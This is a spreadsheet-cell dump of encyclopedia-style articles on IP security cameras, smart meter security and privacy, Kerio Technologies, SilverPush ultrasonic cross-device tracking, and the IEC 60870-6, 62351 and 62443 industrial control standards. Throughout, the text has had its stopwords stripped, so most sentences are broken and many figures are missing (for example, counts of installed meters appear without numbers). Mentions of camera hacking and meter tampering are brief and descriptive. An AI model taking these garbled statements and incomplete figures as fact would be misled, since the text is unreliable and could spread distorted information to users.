video (e.g., clerk assisting customer step-by-step instructions) wi-fi wireless network distributed artificial intelligence (dai)—as camera contain video analytics analyze images secure data transmission encryption authentication methods wpa2, tkip remote accessibility lets users view live video device sufficient access privileges power ethernet (poe) supply power ethernet cable operate without dedicated power supply better image resolution, typically four times resolution analog camera artificial intelligence internet privacy american civil liberties union (aclu) expressed privacy concerns widely practiced. capable tracking movements studying behaviors; moreover, also recognize emotions, predict patterns movement. facial recognition system facial recognition identifies human face analyzing facial features picture video, example biometrics. camera allows users database includes family members close friends, system distinguish whether someone exists database. camera capable providing accurate facial recognition, tell person detects authorized database). detection unauthorized persons prompt owner call enforcement. footage used means identifying apprehending offenders. potential concerns concerns include: privacy concerns average higher purchase cost camera security compromised insecure credentials, given camera accessed independently video recorder. public internet connection video complicated using peer-to-peer (p2p) network. data storage capacity concerns hacking video transmitted public internet rather private network intranet, cctv devices potentially becomes open wider audience including hackers. criminals hack cctv systems disable, manipulate, observe security measures, thereby rendering surveillance counterproductive. this counteracted ensuring network device secured setting complex passwords keeping software firmware date. 2012, users 4chan hacked thousands streaming personal cameras exploiting vulnerability models trendnet home security cameras. 2014, reported site indexed 73,011 locations worldwide security cameras used default usernames passwords, therefore, unprotected. also closed-circuit television camera dashcam remote camera references external links media related cameras wikimedia commons</t>
  </si>
  <si>
    <t>Security of smart meters</t>
  </si>
  <si>
    <t>smart meter electronic device records information consumption electric energy, voltage levels, current, power factor. smart meters communicate information consumer greater clarity consumption behavior, electricity suppliers system monitoring customer billing. smart meters typically record energy near real-time, report regularly, short intervals throughout day. smart meters enable two-way communication meter central system. such advanced metering infrastructure (ami) differs automatic meter reading (amr) enables two-way communication meter supplier. communications meter network wireless, fixed wired connections power line carrier (plc). wireless communication options common include cellular communications, wi-fi (readily available), wireless networks wi-fi, wireless mesh networks, power long-range wireless (lora), wize (high radio penetration rate, open, using frequency mhz) zigbee (low power, data rate wireless), wi-sun (smart utility networks). overview term smart meter often refers electricity meter, also mean device measuring natural gas, water district heating consumption. similar meters, usually referred interval time-of-use meters, existed years, "smart meters" usually involve real-time near real-time sensors, power outage notification, power quality monitoring. these additional features simple automated meter reading (amr). they similar many respects advanced metering infrastructure (ami) meters. interval time-of-use meters historically installed measure commercial industrial customers, automatic reading.research consumer group, showed many three confuse smart meters energy monitors, also known in-home display monitors.the installed base smart meters europe 2008 million units, according analyst firm berg insight. globally, pike research found smart meter shipments 17.4 million units first quarter 2011. visiongain determined value global smart meter market would reach us$7 billion 2012.as january 2018, million electricity meters deployed across european union, estimated million installed 2020. european commission energy estimates 2020 installed base required €18.8 billion investment, growing €40.7 billion 2030, total deployment million smart meters.by 2018, u.s. million smart meters installed. 2017, million smart meters installed globally. revenue generation expected grow $12.8 billion 2017 billion 2022.smart meters part smart grid, constitute smart grid. brief history 1972, theodore paraskevakos, working boeing huntsville, alabama, developed sensor monitoring system used digital transmission security, fire, medical alarm systems well meter reading capabilities. this technology spin-off automatic telephone line identification system, known caller 1974, paraskevakos awarded u.s. patent technology. 1977, launched metretek, inc., developed produced first smart meters. since system developed pre-internet, metretek utilized series mini-computer. approach, paraskevakos metretek awarded multiple patents. purpose since inception electricity deregulation market-driven pricing throughout world, utilities looking means match consumption generation. non-smart electrical meters measure total consumption, providing information energy consumed. smart meters provide measuring electricity consumption near real-time. this allows utility companies charge different prices consumption according time season. also facilitates accurate cash-flow models utilities. since smart meters read remotely, labor costs reduced utilities. smart metering offers potential benefits customers. these include, estimated bills, major source complaints many customers tool help consumers better manage energy purchases—smart meters display outside homes could provide up-to-date information electricity consumption help people manage energy reduce energy bills. with regards consumption reduction, critical understanding benefits smart meters relatively small percentage benefits terms savings multiplied millions users. smart meters water consumption also provide detailed timely information customer water early notification possible water leaks premises. electricity pricing usually peaks certain predictable times season. particular, generation constrained, prices rise power jurisdictions costly generation brought online. proponents assert billing customers higher rate peak times encourages consumers adjust consumption habits responsive market prices assert further, regulatory market design agencies hope "price signals" could delay construction additional generation least purchase energy higher-priced sources, thereby controlling steady rapid increase electricity prices.an academic study based existing trials showed homeowners' electricity consumption average reduced approximately 3-5% provided real-time feedback.another advantage smart meters benefits customers utility monitoring capability provide whole electrical system. part ami, utilities real-time data smart meters measurements related current, voltage, power factor detect system disruptions quickly, allowing immediate corrective action minimize customer impact blackouts. smart meters also help utilities understand power grid needs granularity legacy meters. this greater understanding facilitates system planning meet customer energy needs reducing likelihood additional infrastructure investments, eliminates unnecessary spending energy cost increases.though task meeting national electricity demand accurate supply becoming ever challenging intermittent renewable generation sources make greater proportion energy mix, real-time data provided smart meters allow grid operators integrate renewable energy onto grid order balance networks. result, smart meters considered essential technology decarbonisation energy system. technology connectivity communication critical technological requirement smart meters. each meter must able reliably securely communicate information collected central location. considering varying environments places meters found, problem daunting. among solutions proposed are: cell pager networks, satellite, licensed radio, combination licensed unlicensed radio, power line communication. medium used communication purposes, also type network used, critical. such, would find: fixed wireless, wireless mesh network wireless networks, combination two. there several potential network configurations possible, including wi-fi internet related networks. date solution seems optimal applications. rural utilities different communication problems urban utilities utilities located difficult locations mountainous regions areas ill-served wireless internet companies. addition communication head-end network, smart meters need part home area network, include in-premises display interface meters head end. technologies network vary country country, include power line communication, wireless network, zigbee. protocols ansi c12.18 ansi standard describes protocol used two-way communications meter, mostly used north american markets. c12.18 standard written specifically meter communications ansi type optical port, specifies lower-level protocol details. ansi c12.19 specifies data tables used. ansi c12.21 extension c12.18 written modem instead optical communications, better suited automatic meter reading. ansi c12.22 communication protocol remote communications. 61107 communication protocol smart meters published widely used utility meters european union. superseded 62056, remains wide simple well-accepted. sends ascii data using serial port. physical media either modulated light, sent received photodiode, pair wires, usually modulated eia-485. protocol half-duplex. 61107 related sometimes wrongly confused with, flag protocol. ferranti landis+gyr early proponents interface standard eventually became sub-set iec1107. open smart grid protocol (osgp) family specifications published european telecommunications standards institute (etsi) used conjunction iso/iec 14908 control networking standard smart metering smart grid applications. millions smart meters based osgp deployed worldwide. july 2015, osgp alliance announced release security protocol (osgp-aes-128-psk) availability osgp vendors. this deprecated original osgp-rc4-psk security protocol identified vulnerable.there growing trend toward tcp/ip technology common communication platform smart meter applications, utilities deploy multiple communication systems, using technology common management platform. universal metering interface would allow development mass production smart meters smart grid devices prior communication standards set, relevant communication modules easily added switched are. this would lower risk investing wrong standard well permit single product used globally even regional communication standards vary.some smart meters test transmit non-encrypted usage data bypasses meter security transmitting lower level data real-time. smart meter equipment technical specifications (smets) smart meters variants classified smart meter equipment technical specifications (smets), first generation smart meters commonly known smets1 second generation smart meters known smets2.in august 2020, smart meter installer first company three-phase smets2 meter developed aclara technologies behalf energy supplier, good energy. data management critical technology smart meter systems information technology utility integrates smart meter networks utility applications, billing cis. this includes meter data management system. also essential smart grid implementations power line communication (plc) technologies used within home home area network (han), standardized compatible. allows hvac systems household appliances communicate smart meter, utility. currently several broadband narrowband standards place, developed, compatible. address issue, national institute standards technology (nist) established pap15 group, studies recommends coexistence mechanisms focus harmonization standards han. objective group ensure technologies selected coexist minimum. leading broadband technologies selected homeplug ieee 1901 itu-t g.hn technologies. technical working groups within organizations working develop appropriate coexistence mechanisms. homeplug powerline alliance developed standard smart grid communications called homeplug green specification. interoperable coexistent widely deployed homeplug technology latest ieee 1901 global standard based broadband ofdm technology. itu-t commissioned 2010 project called g.hnem, address home networking aspects energy management, built upon existing frequency narrowband ofdm technologies. google.org's powermeter, demise 2011, able smart meter tracking electricity usage, emeter' energy engage example, powercentsdc(tm) demand response program. advanced metering infrastructure advanced metering infrastructure (ami) refers systems measure, collect, analyze energy usage, communicate metering devices electricity meters, meters, heat meters, water meters, either request schedule. these systems include hardware, software, communications, consumer energy displays controllers, customer associated systems, meter data management software, supplier business systems. government agencies utilities turning toward advanced metering infrastructure (ami) systems part larger "smart grid" initiatives. extends automatic meter reading (amr) technology providing two-way meter communications, allowing commands sent toward home multiple purposes, including time-based pricing information, demand-response actions, remote service disconnects. wireless technologies critical elements neighborhood network, aggregating mesh configuration thousands meters back haul utility’s headquarters. network measurement devices business systems allows collection distribution information customers, suppliers, utility companies, service providers. this enables businesses participate demand response services. consumers information provided system change normal consumption patterns take advantage lower prices. pricing used curb growth peak demand consumption. differs traditional automatic meter reading (amr) enables two-way communications meter. systems capable meter readings qualify systems. opposition concerns some groups expressed concerns regarding cost, health, fire risk, security privacy effects smart meters remote controllable "kill switch" included them. many concerns regard wireless-only smart meters home energy monitoring control safety features. metering-only solutions, popular utilities existing business models cheap up-front capital costs, often result "backlash". often entire smart grid smart building concept discredited part confusion difference home control home area network technology ami. (now former) attorney general connecticut stated believe smart meters provide financial benefit consumers, however, cost installation system absorbed customers. security smart meters expose power grid cyberattacks could lead power outages, cutting people's electricity overloading grid. however many cyber security experts state smart meters germany relatively high cybersecurity attack would thus require extraordinarily high efforts financial resources. cyber security took effect june 2019, includes directive security network information systems establishing notification security requirements operators essential services.through smartgrid cybersecurity committee, u.s. department energy published cybersecurity guidelines grid operators 2010 updated 2014. guidelines “...present analytical framework organizations develop effective cybersecurity strategies...” implementing security protocols protect devices malicious attacks problematic, limited computational resources long operational life.the current version 62056 includes possibility encrypt, authenticate, sign meter data. proposed smart meter data verification method involves analyzing network traffic real-time detect anomalies using intrusion detection system (ids) identifying exploits leveraged attackers, mitigates suppliers' risks energy theft consumers denial-of-service attacks hackers. energy utilities must choose centralized ids, embedded ids, dedicated depending individual needs utility. researchers found typical advanced metering infrastructure, centralized architecture superior terms cost efficiency security gains.in united kingdom, data communication company, transports commands supplier smart meter, performs additional anomaly check commands issued (and signed) energy supplier. smart meter devices intelligent measurement devices periodically record measured values send data encrypted service provider, therefore switzerland devices need evaluated evaluation laboratory, need certified metas 01.01.2020 according prüfmethodologie (test methodology execution data security evaluation swiss smart metering components). according report published brian krebs, 2009 puerto rico electricity supplier asked investigate large-scale thefts electricity related smart meters. found former employees power company company made meters paid consumers reprogram devices show incorrect results, well teaching people themselves. health safety most health concerns meters arise pulsed radiofrequency (rf) radiation emitted wireless smart meters.members california state assembly asked california council science technology (ccst) study issue potential health impacts smart meters, particular whether current standards protective public health. ccst report april 2011 found health impacts, based lack scientific evidence harmful effects radio frequency (rf) waves exposure people homes smart meters likely minuscule compared exposure cell phones microwave ovens. daniel hirsch, retired director program environmental nuclear policy santa cruz, criticized ccst report grounds consider studies suggest potential non-thermal health effects latent cancers exposure. hirsch also stated ccst report failed correct errors comparison cell phones microwave ovens that, errors corrected, smart meters "may produce cumulative whole-body exposures higher cell phones microwave ovens."the federal communications commission (fcc) adopted recommended permissible exposure limit (pel) transmitters (including smart meters) operating frequencies ghz. these limits, based field strength power density, levels radiation hazardous human health.other studies substantiate finding california council science technology (ccst). 2011, electric power research institute performed study gauge human exposure smart meters compared pel. report found smart meters transmit signals time less. rate, distance foot meter, exposure would rate 0.14% pel.issues surrounding smart meters causing fires also reported, particularly involving manufacturer's sensus. 2012. peco energy company replaced sensus meters deployed philadelphia region reports number units overheated caused fires. july 2014, saskpower, province-run utility company canadian province saskatchewan, halted roll-out sensus meters similar, isolated incidents discovered. shortly afterward, portland general electric announced would replace 70,000 smart meters deployed state oregon similar reports. company noted aware issues since least 2013, limited specific models installed 2010 2012. july 2014, total eight recent fire incidents involving meters, saskpower ordered government saskatchewan immediately smart meter program, remove 105,000 smart meters installed. privacy concerns technical reason privacy concerns meters send detailed information much electricity used time. more frequent reports provide detailed information. infrequent reports little benefit provider, allow good demand management response changing needs electricity. hand, widespread reports would allow utility company infer behavioral patterns occupants house, members household probably asleep absent. furthermore, fine-grained information collected smart meters raises growing concerns privacy invasion personal behavior exposure (private activity, daily routine, etc.). current trends increase frequency reports. solution benefits provider user privacy would adapt interval dynamically. another solution involves energy storage installed household used reshape energy consumption profile. british columbia electric utility government-owned must comply privacy laws prevent sale data collected smart meters; many parts world serviced private companies able sell data. australia debt collectors make data know people home. used evidence court case austin, texas, police agencies secretly collected smart meter power usage data thousands residences determine used power "typical" identify marijuana growing operations.smart meter power data usage patterns reveal much much power used. research demonstrated smart meters sampling power levels two-second intervals reliably identify different electrical devices use.ross anderson written privacy concerns. writes necessary meter tell power company, alone government, much used every half-hour period last month"; meters provide "targeting information burglars"; detailed energy usage history help energy companies sell users exploitative contracts; temptation policymakers smart metering data target needed power cuts." opt-out options reviews smart meter programs, moratoriums, delays, "opt-out" programs responses concerns customers government officials. response residents want smart meter, june 2012 utility hawaii changed smart meter program "opt out". utility said smart grid installation project nearing completion, kiuc convert deferral policy opt-out policy program charge members cover costs servicing traditional meters. would require approval hawaii public utilities commission. after receiving numerous complaints health, hacking, privacy concerns wireless digital devices, public utility commission state maine voted allow customers opt-out meter change cost month. connecticut, another state consider smart metering, regulators declined request state's largest utility, connecticut light power, install million devices, arguing potential savings electric bills justify cost. cl&amp;p already offers customers time-based rates. state's attorney general george jepsen quoted saying proposal would cause customers spend upwards $500 million meters benefits return, claim connecticut light power disputed. lack savings results there questions whether electricity primarily "when need service inconvenience/cost-benefit ratio time-shifting loads poor. chicago area, commonwealth edison test installing smart meters 8,000 randomly selected households together variable rates rebates encourage cutting back peak usage. crain's chicago business article "smart grid test underwhelms. pilot, power save money.", reported fewer exhibited amount peak usage reduction overall amount reduction "statistically insignificant". this report electric power research institute, utility industry think tank conducted study prepared report. susan satter, senior assistant illinois attorney general public utilities said "it's devastating plan......the report shows zero statistically different result compared business usual." 2016, million smart meters texas persuaded many people check energy data process complicated.a report parliamentary group suggests people smart meters installed expected save average annually energy bills, much less originally hoped. 2016 cost-benefit analysis updated 2019 estimated similar average saving.the australian victorian auditor-general found 2015 'victoria's electricity consumers paid estimated $2.239 billion metering services, including rollout connection smart meters. contrast, benefits accrued consumers, benefits realisation behind schedule benefits realised' erratic demand smart meters allow real-time pricing, theory could help smooth power consumption consumers adjust demand response price changes. however, modelling researchers university bremen suggests certain circumstances, "power demand fluctuations dampened amplified instead." media 2013, take back your power, independent canadian documentary directed josh released describing "dirty electricity" aforementioned issues smart meters. film explores various contexts health, legal, economic concerns. features narration mayor peterborough, ontario, daryl bennett, well american researcher de-kun journalist blake levitt, milham. award best feature-length documentary annual humanitarian award indie fest following year. criticism smart meter roll-out citizens advice said august 2018 people smart meters happy them. still, 3,000 calls 2017 problems. these related first-generation smart meters losing functionality, aggressive sales practices, still send smart meter readings.ross anderson foundation information policy research criticised uk's program grounds unlikely lower energy consumption, rushed expensive, promote metering competition. anderson writes, "the proposed architecture ensures continued dominance metering energy industry incumbents whose financial interests selling energy rather less," urged ministers kill project instead promote competition domestic energy metering, germans already industrial metering. every consumer right appoint meter operator choice."in 2011 submission public accounts committee, anderson wrote ofgem "making classic mistakes known years lead public-sector project failures" "most critical part project—how smart meters talk domestic appliances facilitate demand response—is essentially ignored."the high number smets1 meters installed criticized peter earl, head energy price comparison website comparethemarket.com. said, "the government expected would small number first-generation smart meters smets came reality least five million perhaps many million smets meters."uk smart meters southern england midlands mobile phone network communicate, work correctly phone coverage weak. solution proposed, operational march 2017.in march 2018 national audit office (nao), watches public spending, opened investigation smart meter program, cost £11bn then, paid electricity users higher bills. national audit office published findings investigation report titled "rolling smart meters" published november 2018. report, amongst findings, indicated number smart meters installed would fall materially short department business, energy industrial strategy (beis) original ambitions consumers smart meter installed 2020. september 2019, smart meter rollout delayed four years.ross anderson alex henney wrote miliband cooked books" make case smart meters appear economically viable. they first three cost-benefit analyses residential smart meters found would cost would save, "ministers kept trying positive result... achieve 'profitability' previous government stretched assumptions shamelessly".an economist ofgem oversight roll-out smart meter program raised concerns manager threatened imprisonment intended protect national security. employment appeal tribunal found contravention european convention human rights. also references external links smart utility networks u.s. standardization process demand response advanced metering coalition. definitions. advanced metering infrastructure (ami), department primary industries, victoria, australia smart metering projects google maps metered billing? they 1886, too—ars technica</t>
  </si>
  <si>
    <t>Kerio Technologies</t>
  </si>
  <si>
    <t>kerio technologies, inc. former technology company specializing collaboration software unified threat management small medium organizations. founded 2001, kerio headquartered jose, california. january 2017, software acquired kerio. history kerio technologies incorporated 2001, first product winroute entered internet security market 1997, owned maintained tiny software february 2002. tiny software transferred sales development software kerio, developers continued work kerio brand.kerio's main products early 2000s) kerio personal firewall kerio winroute firewall company focused collaboration software kerio mailserver. kerio discontinued personal firewall late 2005, acquired sunbelt software.starting 2010, kerio mailserver renamed kerio connect kerio winroute kerio control. kerio introduced kerio operator, system, 2011 samepage, file sharing collaboration software, 2013.in january 2017, kerio bought software. kerio connect, kerio control, kerio operator kerio cloud became assets samepage part acquisition. references external links official website</t>
  </si>
  <si>
    <t>SilverPush</t>
  </si>
  <si>
    <t>silverpush singapore based marketing technology solutions provider.the company founded september 2012, hitesh chawla. after starting push notification advertisement 2013, launched india's first platform 2014. company backed ventures, palaash ventures, fabrice grinda, k.ganesh, startups, partners freak inc, japan. silverpush's in-video context detection platform uses artificial intelligence computer vision accurately identify in-video contexts, including logos, faces, objects, actions, scenes, enable contextual video placements line content users actively engaging with. brand safety platform uses in-video context detection contextually filter harmful irrelevant content. offering brands, suitable video environment, surpassing traditional measures like keywords blacklist, whitelisted channels more. products april 2019, silverpush introduced parallels, sync technology syncs physical events real-time. november 2019, silverpush launched mirrors, artificial intelligence-driven technology aims deliver relevant in-video analysing appears content. mirrors using context detection technology videos viewed online. 2020, silverpush launched mirrors safe, ai-powered brand suitability platform. technology filed patents, proprietary technology products. real-time sync across digital channels. near real-time detection detection time. innovative video fingerprint matching technology detect real-time. 95%+ accuracy detection. funding april 2014, geektime reported silverpush raised $1.5 million funding increase global reach.in february 2019, silverpush raised million series freakout holdings. privacy implications silverpush track users across multiple devices privacy implications allows detailed tracking users. data collected multiple devices used single user correlated form accurate picture person tracked.in july 2014, techcrunch reported silverpush using "ultrasonic inaudible sounds" called "audio beacons" along cookies reliably track users across multiple devices devices containing silverpush constantly listening audio beacons.in april 2015, silverpush claimed apps using code.in october 2015, center democracy technology submitted comments federal trade commission (ftc) regarding silverpush's cross-device tracking technology.in march 2016, issued warning letters developers using silverpush code apps. warned developers violating state imply apps tracking television viewing habits fact are. shortly warning, silverpush made official statement ending unique audio beacon service. however, march 2016, silverpush still advertising unique audio beacon website.in november 2016, researchers ucl, ucsb polimi demonstrated security privacy implications ultrasound cross-device tracking (uxdt) technology used silverpush. notable attacks uses uxdt-enabled applications deanonymize users.in 2017 silverpush technology subject research: team researchers brunswick technical university germany discovered [234] android apps employ ultrasonic tracking beacons track users nearby environment. their research paper focused technology ultrasound cross-device tracking (uxdt)." also (networking) badbios near sound data transfer slicklogin cross-device tracking references external links letter warning letter silverpush wiki silverpushunmasked github demo:tor deanonymization using uxdt</t>
  </si>
  <si>
    <t>IEC 60870-6</t>
  </si>
  <si>
    <t>60870 part electrical engineering power system automation, 60870 standards define systems used telecontrol (supervisory control data acquisition) electrical engineering power system automation applications. technical committee (working group developed part provide communication profile sending basic telecontrol messages systems compatible standards itu-t recommendations. related standards these standards include: 60870-6-1 application context organization standards 60870-6-2 basic standards (osi layers 1–3) 60870-6-501 tase.1 service definitions 60870-6-502 tase.1 protocol definitions 60870-6-503 tase.2 services protocol 60870-6-504 tase.1 user conventions 60870-6-505 tase.2 user guide 60870-6-601 functional profile providing connection-oriented transport service system connected permanent access packet switched data network 60870-6-602 tase transport profiles 60870-6-701 functional profile providing tase.1 application service systems 60870-6-702 functional profile providing tase.2 application service systems 60870-6-802 tase.2 object models national networks typical national power grid includes hierarchy control centres manage generation, transmission, distribution power throughout grid: system control centres, responsible scheduling power generation meet customer demand, managing major network outages faults. generation control centres, responsible managing operation generating plants (coal-fired, natural gas, nuclear, solar, wind, etc.), adjusting power generated according requirements system control centre. transmission control centres, responsible transmission power generating stations network distributors. distribution control centres, responsible distribution power transmission networks individual consumers.prior development electronics telecommunications networks co-ordination control centres carried telephone. however, development scada (supervisory control data acquisition) systems allowed remote control monitoring electrical plant centralised control centres. initially individual scada manufacturers developed proprietary "closed" protocols communicating control centre electrical equipment field. these followed development "open" industry-standard protocols dnp3 61850. however, none communication protocols suited requirements communicating control centres. meet special requirements communication co-ordination control centres developed 60870 standards. inter-control center communications protocol inter-control center communications protocol (iccp 60870-6/tase.2) specified utility organizations throughout world provide data exchange wide area networks (wans) utility control centers, utilities, power pools, regional control centers, non-utility generators. iccp also international standard: international electrotechnical commission (iec) telecontrol application service element (tase.2). background inter-utility real time data exchange become critical operation interconnected systems parts world. example, development electricity markets seen management electricity networks functional hierarchy split across boundaries commercial entities. level typically system operator coordination responsibilities dispatch overall system security. below regional transmission companies together distribution companies generating companies. continental power systems considerable interconnection across international borders. iccp allows exchange real time historical power system information including status control data, measured values, scheduling data, energy accounting data operator messages. historically reliance custom proprietary links protocols exchange real time data systems. iccp began effort develop international standard real-time data exchange within electric power utility industry. working group formed 1991 develop protocol standard, develop prototype test specification, submit specification standardisation carry interoperability testing developing vendors. initial driver meet european common market requirements 1992. official designation first protocol tase.1 (telecontrol application service element-1). second protocol tase.2 making manufacturing message specification (mms) appears version become popular. iccp networks widely used together groups utility companies, typically regional system operator transmission utilities, distribution utilities generators. regional operators also connected together co-ordinate import export power regions across major inter-ties. iccp functionality basic iccp functionality specified “conformance blocks” listed below. objects used convey data defined various parts 60870-6. block description data examples: periodic system data: status points, analogue points, quality flags, time stamp, change value counter, protection events. association objects control iccp sessions. extended data condition monitoring: provides report exception capability data types block able transfer periodically. block data transfer: provides means transferring block block data types block transfers instead point point. situations reduce bandwidth requirements. information messages: simple text binary files. device control: device control requests: on/off, trip/close, raise/lower etc. digital setpoints. includes mechanisms interlocked controls select-beforeoperate. program control: allows iccp client remote control programs executing iccp server. event reporting: extended reporting client error conditions device state changes server. additional user objects: scheduling, accounting, outage plant information. time series data: allows client request report server historical time series data start date. protocol architecture iccp based client server principles. data transfers result request control centre (client) another control centre (server). control centres clients servers. iccp operates application layer model. physical interfaces, transport network services model supported. tcp/ip ethernet (802.3) seems common. iccp operate single point-to-point link control centres; however, general case many control centres routed wide area network. logical connections “associations” control centres completely general. client establish associations server client establish association server. multiple associations server established different levels quality service high priority real time data delayed lower priority real time data transfers. access control iccp provide authentication encryption. these services normally provided lower protocol layers. iccp uses “bilateral tables” control access. bilateral table represents agreement control centres connected iccp link. agreement identifies data elements objects accessed link level access permitted. once iccp link established, contents bilateral tables server client provide complete control accessible party. there must matching entries server client tables provide access data objects. interoperability wide acceptance iccp utility industry resulted several iccp products market. although interoperability regarded high risk area, standard implementation support conformance blocks order claim compliance standard. minimal implementation requires block only blocks necessary achieve required functionality need implemented. also necessary support objects defined standard particular block. extensive interoperability testing products major vendors feature iccp protocol development. independent reports available, doubt reports vendors. iccp purchaser must define functionality required terms conformance blocks required objects within blocks. application profiles iccp client server conformances must match link operate successfully. product differentiation iccp real time data exchange protocol providing features data transfer, monitoring control. complete iccp link need facilities manage configure link monitor performance. iccp standard specify interface requirements features necessary nevertheless affect interoperability. similarly failover redundancy schemes scada responds iccp requests protocol issue specified. these protocol specific features referred standard “local implementation issues”. iccp implementers free handle issues wish. local implementation means developers differentiate product market added value. additional money spent product well-developed maintenance diagnostic tools well saved many times life product iccp connection expected grow change. product configurations commercial iccp products generally available three configurations: native protocol embedded scada host. networked server. gateway processor.as embedded protocol iccp management tools interfaces part complete suite tools scada. this configuration offers maximum performance direct access scada database without requiring intervening buffering. this approach available addition legacy system. iccp application restricted accessing scada environment embedded. networked server making industry standard communications networking scada host provide performance approaching embedded iccp application. application interface side iccp restricted scada environment open systems separate data historian databases. security easier manage iccp server segregated operational real time systems. gateway processor approach similar networked server except intended legacy systems minimal communications networking capability lowest performance. minimal situation iccp gateway communicate scada host serial port similar manner scada rtus. also 60870-5 61850 references external links iccp open iccp</t>
  </si>
  <si>
    <t>IEC 62351</t>
  </si>
  <si>
    <t>62351 standard developed wg15 tc57. this developed handling security series protocols including 60870-5 series, 60870-6 series, 61850 series, 61970 series 61968 series. different security objectives include authentication data transfer digital signatures, ensuring authenticated access, prevention eavesdropping, prevention playback spoofing, intrusion detection. standard details 62351-1 introduction standard 62351-2 glossary terms 62351-3 security profiles including tcp/ip. encryption node authentication means x.509 certificates message authentication 62351-4 security profiles including (e.g., iccp-based 60870-6, 61850, etc.). authentication (rfc 2246)is inserted 1006 provide transport layer security 62351-5 security profiles including 60870-5 (e.g., dnp3 derivative) tcp/ip profiles encryption serial profiles. 62351-6 security 61850 profiles. vlan made mandatory goose 2030 used sntp 62351-7 security network system management. defines management information base (mibs) specific power industry, handle network system management snmp based methods. 62351-8 role-based access control. covers access control users automated agents data objects power systems means role-based access control (rbac). 62351-9 management describes correct safe usage safety-critical parameters, e.g. passwords, encryption keys. covers whole life cycle cryptographic information (enrollment, creation, distribution, installation, usage, storage removal). methods algorithms using asymmetric cryptography handling digital certificates (public private key) setup environment x.509 certificates certificate enrollment means scep certificate revocation means ocsp secure distribution mechanism based gdoi ikev2 protocol presented usage symmetric keys, e.g. session keys. 62351-10 security architecture explanation security architectures entire infrastructure identifying critical points communication architecture, e.g. substation control center, substation automation appropriate mechanisms security requirements, e.g. data encryption, user authentication applicability well-proven standards domain, e.g. tunnel, secure ftp, https 62351-11 security files embedding original content container date issue access control data x.509 signature authenticity data optional data encryption also list technical committees external links application 62351 ipcomm gmbh report implementation 62351-7 "iec 62351" international electrotechnical commission</t>
  </si>
  <si>
    <t>IEC 62443</t>
  </si>
  <si>
    <t>62443 international series standards address cybersecurity operational technology automation control systems. standard divided different sections describes technical process-related aspects automation control systems cybersecurity. divides cybersecurity topics stakeholder category roles including: operator, service providers (service providers integration maintenance) component/system manufacturers. different roles follow risk-based approach prevent manage security risks activities. history international standard, 62443 family standards result international electrotechnical commission (iec) standards creation process national committees involved agree upon common standard. multiple organizations committees submitted input working groups helped shape 62443 family standard. starting 2002, international society automation (isa), professional automation engineering society ansi-accredited standards development organization (sdo) established industrial automation control system security standards committee (isa99). isa99 committee developed multi-part series standards technical reports industrial automation control system (iacs) cyber security. these work products submitted approval published north american ansi standards. standards documents originally referred ansi/isa-99 isa99 standards renumbered ansi/isa-62443 series 2010. content series submitted used working groups. parallel, german engineering associations released vdi/vde 2182 guidelines 2011. guidelines describe handle information security industrial automation environments also submitted used working groups. 2021, approved 62443 family standards 'horizontal standards'. this means sector specific standards operational technology developed subject matter experts, 62443 standards must used foundation requirements addressing cybersecurity standards. this approach serves avoid proliferation partial and/or conflicting requirements addressing cybersecurity operational technology across industry sectors similar technology products deployed operating sites. structure 62443 industrial communication networks network system security series standards consists following parts: part 1-1: terminology, concepts models (technical specification, edition 1.0, july 2009) part 2-1: establishing industrial automation control system security program (international standard, edition 1.0, november 2010) this section standard aimed operators automation solutions defines requirements security operation plants considered (see iso/iec 27001). part 2-3: patch management iacs environment (technical report, edition 1.0, june 2015) part 2-4: security program requirements iacs service providers (technical report, edition 1.1, august 2017) this part defines requirements ("capabilities") integrators. these requirements divided topics: assurance, architecture, wireless, security engineering systems, configuration management, remote access, event management logging, user management, malware protection, patch management, backup recovery, project staffing. part 3-1: security technologies industrial automation control systems (technical report, edition 1.0, july 2009) part 3-2: security risk assessment system design (international standard, edition 1.0, june 2020) part 3-3: system security requirements security levels (international standard, edition 1.0, august 2013) technical requirements systems security levels described part. part 4-1: secure product development lifecycle requirements (international standard, edition 1.0, january 2018) section 62443 defines secure product development process look like. divided eight areas ("practices"): management development, definition security requirements, design security solutions, secure development, testing security features, handling security vulnerabilities, creation publication updates documentation security features. part 4-2: technical security requirements iacs components (international standard, edition 1.0, february 2019) this section defines technical requirements products components. like requirements systems (section -3-3), requirements divided subject areas refer them. addition technical requirements, common component security constraints (ccsc) defined, must components compliant 62443-4-2: ccsc describes components must take account general security characteristics system used. ccsc specifies technical requirements component cannot meet compensating countermeasures system level (see 62443-3-3). purpose, countermeasures must described documentation component. ccsc requires "least privilege" principle applied component. ccsc requires component developed supported 62443-4-1 compliant development processes. maturity security level 62443 describes different levels maturity processes technical requirements. maturity levels processes based maturity levels cmmi framework. maturity level based cmmi, 62443 describes different maturity levels processes so-called "maturity levels". fulfill certain level maturity level, process-related requirements must always practiced product development integration, i.e. selection individual criteria ("cherry picking") standard-compliant. maturity levels described follows: maturity level initial: product suppliers usually carry product development often undocumented fully documented). maturity level managed: product supplier able manage development product according written guidelines. must demonstrated personnel carry process appropriate expertise, trained and/or follow written procedures. processes repeatable. maturity level defined (practiced): process repeatable throughout supplier's organization. processes practiced evidence done. maturity level improving: product suppliers appropriate process metrics monitor effectiveness performance process demonstrate continuous improvement areas. security level technical requirements systems (iec 62443-3-3) products (iec 62443-4-2) evaluated standard four so-called security levels (sl). different levels indicate resistance different classes attackers. standard emphasizes levels evaluated technical requirement (see 62443-1-1) suitable general classification products. levels are: security level special requirement protection required. security level protection unintentional accidental misuse. security level protection intentional misuse simple means resources, general skills motivation. security level protection intentional misuse sophisticated means moderate resources, iacs-specific knowledge moderate motivation. security level protection intentional misuse using sophisticated means extensive resources, iacs-specific knowledge high motivation. concepts standard explains various basic principles considered roles activities. defense depth defense depth concept several levels security (defense) distributed throughout system. goal provide redundancy case security measure fails vulnerability exploited. zones conduits zones divide system homogeneous zones grouping (logical physical) assets common security requirements. security requirements defined security level (sl). level required zone determined risk analysis. zones boundaries separate elements inside zone outside. information moves within zones. zones divided sub-zones define different security levels (security level) thus enable defense-in-depth. conduits group elements allow communication zones. they provide security functions enable secure communication allow coexistence zones different security levels. certification standards processes, systems products used industrial automation environments certified according 62443. many testing, inspection, certification (tic) companies offer product process certifications based 62443. accrediting according iso/iec 17000 series standards, companies share single, consistent certification requirements 62443 certifications elevates usefulness resulting certificates conformance. accredited certification schemes 62443 certification schemes established several global testing, inspection, certification (tic) companies. schemes based referenced standards define test methods, surveillance audit policies, public documentation policies, specific aspects program. cybersecurity certification programs 62443 standards offered globally many recognized certification bodies (cb), including bureau veritas, intertek, sgs-tüv 